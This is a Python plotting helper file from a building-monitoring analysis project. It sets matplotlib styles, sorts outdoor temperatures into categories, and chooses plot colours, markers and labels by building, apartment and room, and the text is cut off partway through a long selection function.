| 39.908886 | 157 | 0.586544 | 4,418 | 35,479 | 4.547986 | 0.067678 | 0.014433 | 0.015229 | 0.013139 | 0.928084 | 0.925098 | 0.923605 | 0.923605 | 0.920768 | 0.92052 | 0 | 0.037194 | 0.296767 | 35,479 | 888 | 158 | 39.953829 | 0.768136 | 0.113053 | 0 | 0.907834 | 0 | 0.012289 | 0.11483 | 0.009865 | 0 | 0 | 0 | 0 | 0.012289 | 1 | 0.024578 | false | 0 | 0.02765 | 0 | 0.06298 | 0.09063 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c02e42c7b3140ddf709736798558e4fc1c0b0e8d | 119,510 | py | Python | src/plotprops.py | RWTH-EBC/WinProGen | b5152ccaac12ba65f9ec0438cd89732a643812fd | [
"MIT"
] | 3 | 2018-05-04T08:16:56.000Z | 2021-08-20T09:10:09.000Z | src/plotprops.py | RWTH-EBC/WinProGen | b5152ccaac12ba65f9ec0438cd89732a643812fd | [
"MIT"
] | null | null | null | src/plotprops.py | RWTH-EBC/WinProGen | b5152ccaac12ba65f9ec0438cd89732a643812fd | [
"MIT"
] | null | null | null | '''
Created on 18.03.2015
@author: Marco Bertinelli
'''
import pandas as pd
from pandas import Series, DataFrame, MultiIndex
import matplotlib.pyplot as plt
import matplotlib
import matplotlib.gridspec as gridspec
import numpy as np
from matplotlib.patches import Polygon
from docutils.languages.af import labels
# import HistoQhObs as HistoQhObs
# import HistoQhObs_Together as HistoQhObs_Together
# import plotDiurnalValidateNew as plotDiurnalValidateNew
# import plotWAT as plotWAT
sizeText=10
params = {'backend': 'wxAgg', 'lines.markersize' : 6,
'axes.labelsize': sizeText, "mathtext.default":"regular",
'text.fontsize': sizeText, 'axes.titlesize':sizeText, 'legend.fontsize': sizeText,
'xtick.labelsize': sizeText, 'ytick.labelsize': sizeText}
plt.rcParams.update(params)
fontsize_XLabel = 14
fontsize_YLabel = 14
fontsize_title = 14
fontsize_XTicks = 14
fontsize_YTicks = 14
fontsize_Legend = 14
WithLegendFrame = False
def create_Standardfigure():
"""
prepares a figures """
fontsize_XLabel = 14
fontsize_YLabel = 14
fontsize_title = 14
fontsize_XTicks = 14
fontsize_YTicks = 14
fontsize_Legend = 14
WithLegendFrame = False
fig = plt.figure(figsize=(8, 5))
fig.subplots_adjust(left=0.15)
gs1 = gridspec.GridSpec(1, 1)
ax = plt.subplot(gs1[0, :])
ax.set_ylim(0,1.1)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3, box.width, box.height * 0.7])
#ax.set_xticks(np.linspace(ticks[0], d.date2num(d.num2date(ticks[-1]) + dt.timedelta(hours=3)), 5))
#ax.set_xticks(np.linspace(ticks[0], d.date2num(d.num2date(ticks[-1]) + dt.timedelta(hours=3)), 25), minor=True)
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%I:%M %p'))
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.2),frameon=WithLegendFrame, ncol=2, fontsize=fontsize_Legend)
return fig, ax
def Histogram_AT():
recFolder = 'D:/ghi-mbe/Daten Auswertung/records/AT/'
t_1 = 5.0
t_2 = 11.0
t_3 = 14.0
t_4 = 18.0
n_0 = "<5" # "A"
n_1 = "5>11" # "B"
n_2 = "11>14" # "C"
n_3 = "14>18" # "D"
n_4 = ">18" # "E"
n_0 = "A"
n_1 = "B"
n_2 = "C"
n_3 = "D"
n_4 = "E"
def func_AT(row):
if row["Weather","-","-","AT"] <= t_1:
return n_0
elif t_1 < row["Weather","-","-","AT"] <= t_2:
return n_1
elif t_2 < row["Weather","-","-","AT"] <= t_3:
return n_2
elif t_3 < row["Weather","-","-","AT"] <= t_4:
return n_3
else:
return n_4
def func_rAT(row):
if row["Weather","-","-","rAT"] <= t_1:
return n_0
elif t_1 < row["Weather","-","-","rAT"] <= t_2:
return n_1
elif t_2 < row["Weather","-","-","rAT"] <= t_3:
return n_2
elif t_3 < row["Weather","-","-","rAT"] <= t_4:
return n_3
else:
return n_4
df1=pd.read_csv(recFolder+'AT2012.csv',index_col=0,sep=';', header=[0,1,2,3],low_memory=False,parse_dates=True)
df1["Weather","-","-","rAT"] = df1.apply(pd.Series.round)
df1["Weather","-","-","Kategorie_AT"] = df1.apply(func_AT, axis=1)
df1["Weather","-","-","Kategorie_rAT"] = df1.apply(func_rAT, axis=1)
# Zaehlen der Kategorien
Kategorie_A = df1[df1["Weather","-","-","Kategorie_AT"]=="A"]
Kategorie_B = df1[df1["Weather","-","-","Kategorie_AT"]=="B"]
Kategorie_C = df1[df1["Weather","-","-","Kategorie_AT"]=="C"]
Kategorie_D = df1[df1["Weather","-","-","Kategorie_AT"]=="D"]
Kategorie_E = df1[df1["Weather","-","-","Kategorie_AT"]=="E"]
Kategorie_rA = df1[df1["Weather","-","-","Kategorie_rAT"]=="A"]
Kategorie_rB = df1[df1["Weather","-","-","Kategorie_rAT"]=="B"]
Kategorie_rC = df1[df1["Weather","-","-","Kategorie_rAT"]=="C"]
Kategorie_rD = df1[df1["Weather","-","-","Kategorie_rAT"]=="D"]
Kategorie_rE = df1[df1["Weather","-","-","Kategorie_rAT"]=="E"]
# Zahlen der Kategoriewechsel allgemein
print ("Kategorie A:", len(Kategorie_A), "Kategorie rA:", len(Kategorie_rA))
print ("Kategorie B:", len(Kategorie_B), "Kategorie rB:", len(Kategorie_rB))
print ("Kategorie C:", len(Kategorie_C), "Kategorie rC:", len(Kategorie_rC))
print ("Kategorie D:", len(Kategorie_D), "Kategorie rD:", len(Kategorie_rD))
print ("Kategorie E:", len(Kategorie_E), "Kategorie rE:", len(Kategorie_rE))
print ("Summe Kategorie A-E:", len(Kategorie_A)+len(Kategorie_B)+len(Kategorie_C)+len(Kategorie_D)+len(Kategorie_E))
print ("Summe Kategorie rA-rE:", len(Kategorie_rA)+len(Kategorie_rB)+len(Kategorie_rC)+len(Kategorie_rD)+len(Kategorie_rE))
# Zaehlen der Kategoriewechsel entsprechend der Tage
Wechsel_A_B = 0
Wechsel_B_C = 0
Wechsel_C_D = 0
Wechsel_D_E = 0
for index, line in enumerate(df1.iterrows()):
if index == len(df1.index)-1:
print ("no")
else:
if df1["Weather","-","-","Kategorie_AT"][index] == "A" and df1["Weather","-","-","Kategorie_AT"][index+1] == "B":
Wechsel_A_B = Wechsel_A_B + 1
if df1["Weather","-","-","Kategorie_AT"][index] == "B" and df1["Weather","-","-","Kategorie_AT"][index+1] == "C":
Wechsel_B_C = Wechsel_B_C + 1
if df1["Weather","-","-","Kategorie_AT"][index] == "C" and df1["Weather","-","-","Kategorie_AT"][index+1] == "D":
Wechsel_C_D = Wechsel_C_D + 1
if df1["Weather","-","-","Kategorie_AT"][index] == "D" and df1["Weather","-","-","Kategorie_AT"][index+1] == "E":
Wechsel_D_E = Wechsel_D_E + 1
# Erkennung von Wochentagen, Wochenende
df1['dayNumber'] = df1.index.weekday
onlyWeekdays = df1[df1['dayNumber']<5]
onlyWeekend = df1[df1['dayNumber']>=5]
print ("Histogram_AT done")
def Select_ColorsAndMarkers(Level0="", Level2="",Level3="", Level4="", Level5=""):
markEntr_Alt1 = True
print ("Start SelectAnalysisFunction")
# ColorList Level0
colorsTemperature=["LimeGreen",'Indigo','RoyalBlue','DeepSkyBlue','Orange','Red']
markersTemperature=['^','o','s','*','d','v']
# ColorList Level2
colorsEntrances=["LimeGreen","ForestGreen","DarkGreen","LightSkyBlue","CornflowerBlue","DarkSlateBlue"]
if markEntr_Alt1:
markersEntrances=['^','o','s','*','d','v'] # alternative 1
else:
markersEntrances2=['^','o','s','^','o','s'] # alternative 2
markersEntrances = markersEntrances2
# ColorList Level3
colorsAps=["Sienna","FireBrick","Red","OrangeRed","Tomato","DeepPink","Fuchsia","Magenta","MediumVioletRed","Crimson","LimeGreen"]
markersAps=["s",'^','o','h','+','x','s','p','*','d',None]
# ColorList Level4
colorRooms=["LimeGreen",'Crimson','GoldenRod','CornflowerBlue',"DarkGreen",'MidnightBlue']
markersRooms=[None,'^','o','s','*','d']
# Checklisten
CheckTemperatures = ["T1","T2","T3","T4","T5"]
CheckTemperatures = ["T0","T1","T2","T3","T4","T5"]
CheckEntrances = ["B2E1","B2E2","B2E3","B3E1","B3E2","B3E3"]
CheckApartments = ["A01","A02","A03","A04","A05","A06","A07","A08","A09","A10",'-']
CheckRooms = ['-', "Room_Bath","Room_Children","Room_Kitchen","Room_Living","Room_Sleeping",]
if Level0 == "T0":
#print "Nur eine Linie, also alle Temperaturbereiche zusammen"
if Level2 == None:
#print "Alle Eingaenge"
if Level3 == "-":
#print "mean von allen Apartments"
if Level4 == "-":
#print "mean von allen Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments","meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings","meanApartments",Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 in CheckApartments:
#print Level3
if Level4 == "-":
print ("mean von allen Rooms")
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,"meanRooms",Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances
markerList = markersEntrances
title = ["T0","allBuildings",Level3,Level4,Level5]
labels = CheckEntrances
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
#-----------------------------------------------------------------
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
else:
print ("ERROR: Auswahl Level3 nicht korrekt")
elif Level2 in CheckEntrances:
#print Level2
if Level3 == "-":
#print "mean von allen Apartments"
if Level4 == "-":
#print "mean von allen Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsEntrances[CheckEntrances.index(Level2)]
markerList = markersEntrances[CheckEntrances.index(Level2)]
title = ["T0", Level2,"meanApartments","meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 == None:
print ("Alle Rooms")
if Level5 == "WP1":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,"meanApartments","allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorRooms[CheckRooms.index(Level4)]
markerList = markersRooms[CheckRooms.index(Level4)]
title = ["T0", Level2,"meanApartments",Level4,Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 == None:
#print "Alle Apartments"
if Level4 == "-":
#print "mean von allen Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments","meanRooms",Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 in CheckRooms:
#print Level4
if Level5 == "WP1":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsAps
markerList = markersAps
title = ["T0", Level2,"allApartments",Level4,Level5]
labels = CheckApartments
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
else:
print ("ERROR: Auswahl Level4 nicht korrekt")
elif Level3 in CheckApartments:
#print Level3
if Level4 == "-":
#print "mean von allen Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPS":
#print Level5
colorList = colorsAps[CheckApartments.index(Level3)]
markerList = markersAps[CheckApartments.index(Level3)]
title = ["T0", Level2,Level3,"meanRooms",Level5]
labels = [""]
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
else:
print ("ERROR: Auswahl Level5 nicht korrekt")
elif Level4 == None:
#print "Alle Rooms"
if Level5 == "WP1":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP2":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
labels = CheckRooms
return colorList, markerList, title, labels
#-----------------------------------------------------------------
elif Level5 == "WP1+2":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WP":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
labels = CheckRooms
selctionStrings = [Level0,Level2,Level3,Level4,Level5]
return colorList, markerList, title, labels, selctionStrings
#-----------------------------------------------------------------
elif Level5 == "WPD":
#print Level5
colorList = colorRooms
markerList = markersRooms
title = ["T0", Level2,Level3,"allRooms",Level5]
